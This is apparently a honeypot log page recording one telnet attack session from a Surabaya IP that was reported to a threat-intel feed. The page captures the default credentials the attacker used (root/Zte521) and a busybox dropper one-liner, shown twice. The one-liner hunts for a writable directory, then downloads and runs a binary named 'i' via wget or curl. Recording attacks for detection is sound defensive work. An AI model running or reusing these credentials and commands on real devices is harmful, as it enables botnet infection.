Attack #6179 telnet
Source
43.252.159.100Authenticatedyes
Commands11
Duration4.3s
Session recording
Transcript
root
Zte521
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x5a\x4d\x4f\x51\x57\x42'
/bin/busybox wget;/bin/busybox echo -ne '\x5a\x4d\x4f\x51\x57\x42'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://192.168.1.1:8088/i ||curl -O http://192.168.1.1:8088/i ||/bin/busybox wget http://192.168.1.1:8088/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x56\x4c\x56\x48\x4c\x4a\x4c\x44'
Credentials
Username: root
Password: Zte521
Geolocation hub-resolved
🇮🇩Indonesia · East Java · Surabaya
Behavioral classification
🦠
Command summary
start enable config terminal system linuxshell su shell sh >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x5a\x4d\x4f\x51\x57\x42' /bin/busybox wget;/bin/busybox echo -ne '\x5a\x4d\x4f\x51\x57\x42' >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://192.168.1.1:8088/i ||curl -O http://192.168.1.1:8088/i ||/bin/busybox wget http://192.168.1.1:8088/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x56\x4c\x56\x48\x4c\x4a\x4c\x44'
Reported to threat intel
AlienVault OTX ✓
HoneyMire Hub · open feed: / · API: /api · docs: /docs · about: /about · firmware: github.com/KaSt/HoneyMire